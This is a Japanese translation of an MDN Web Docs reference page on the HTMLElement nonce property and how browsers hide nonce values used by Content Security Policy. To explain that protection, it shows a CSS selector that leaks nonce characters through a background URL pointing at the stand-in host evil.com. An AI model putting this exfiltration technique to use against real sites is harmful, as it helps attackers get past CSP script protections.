1. 開発者向けのウェブ技術
  2. Web API
  3. HTMLElement
  4. nonce

このページはコミュニティーの尽力で英語から翻訳されました。MDN Web Docs コミュニティーについてもっと知り、仲間になるにはこちらから。

View in English Always switch to English

HTMLElement: nonce プロパティ

Baseline 広く利用可能

この機能は広く実装されており、多くのバージョンの端末やブラウザーで動作します。2022年3月以降、すべてのブラウザーで利用可能です。

nonceHTMLElement インターフェイスのプロパティで、特定の読み取りを続行できるかどうかを決定するためにコンテンツセキュリティポリシーで使用される一度だけの暗号化番号を返します。

後の実装では、 nonce 属性を持つ要素はスクリプトにのみ公開します(CSS 属性セレクターのようなサイドチャネルには公開しません)。

ノンス値の受け取り

以前は、すべてのブラウザーが IDL 属性の nonce に対応している訳ではなかったので、回避策としては、代替として getAttribute を使用するようにしていました。

js
let nonce = script["nonce"] || script.getAttribute("nonce");

しかし、最近の版のブラウザーでは、この方法でアクセスすると nonce の値を隠します(空の文字列が返されます)。 IDL プロパティ (script['nonce']) がノンスにアクセスする唯一の方法となります。

ノンスを隠蔽することは、この CSS セレクターのようなコンテンツ属性からデータを取得するメカニズムによって、攻撃者がノンスデータを流出させることを防ぐのに役立ちます。

css
script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

仕様書

仕様書
HTML
# dom-noncedelement-nonce

ブラウザーの互換性

関連情報

MDN の改良に協力

協力方法を知る

このページは MDN の貢献者によって に最終更新されました。

GitHub でこのページを表示このコンテンツに関する問題を報告